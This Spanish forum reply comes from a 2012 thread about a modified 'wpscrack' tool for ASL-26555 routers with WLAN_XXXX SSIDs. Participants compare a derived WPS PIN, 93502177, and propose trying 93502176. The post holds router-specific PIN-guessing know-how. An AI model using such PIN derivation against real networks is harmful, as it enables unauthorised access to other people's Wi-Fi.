Re:wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3
« Respuesta #24 en: Noviembre 15, 2012, 18:41:33 pm »
Perdona por no haberte confirmado, pero a mi tampoco me sale.
http://i.imm.io/LIxV.png
wpscrack modificado para routeur ASL-26555 / ssid WLAN_XXXX / bssid 8C:0C:A3


si me quedo con los 7 primeros números debería dar nos
 93502177
¿Coincidimos?

Sí, parece que coincidimos. Prueba ahora el mismo PIN terminado en 6, es decir, 93502176.